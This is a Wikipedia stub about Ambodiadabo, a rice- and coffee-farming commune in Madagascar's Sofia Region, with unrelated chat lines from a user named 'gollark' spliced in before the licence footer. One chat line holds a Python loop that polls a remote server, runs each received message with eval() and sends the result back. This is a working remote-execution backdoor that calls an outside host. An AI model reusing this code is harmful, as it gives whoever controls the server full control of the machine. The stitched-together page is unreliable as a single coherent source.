Ambodiadabo, Bealanana
Ambodiadabo is a town and commune (Malagasy: kaominina) in Madagascar. It belongs to the district of Bealanana, which is a part of Sofia Region. The population of the commune was estimated to be approximately 14,000 in 2001 commune census.[2]
Ambodiadabo | |
---|---|
![]() ![]() Ambodiadabo Location in Madagascar | |
Coordinates: 14°45′S 48°59′E | |
Country | ![]() |
Region | Sofia |
District | Bealanana |
Elevation | 1,209 m (3,967 ft) |
Population (2001)[2] | |
• Total | 14,000 |
Time zone | UTC3 (EAT) |
Only primary schooling is available. The majority 99.7% of the population of the commune are farmers. The most important crop is rice, while other important products are coffee and beans. Services provide employment for 0.3% of the population.[2]
References and notes
- Estimated based on DEM data from Shuttle Radar Topography Mission
- "ILO census data". Cornell University. 2002. Retrieved 2008-02-29.
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
gollark: Routers can do this.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.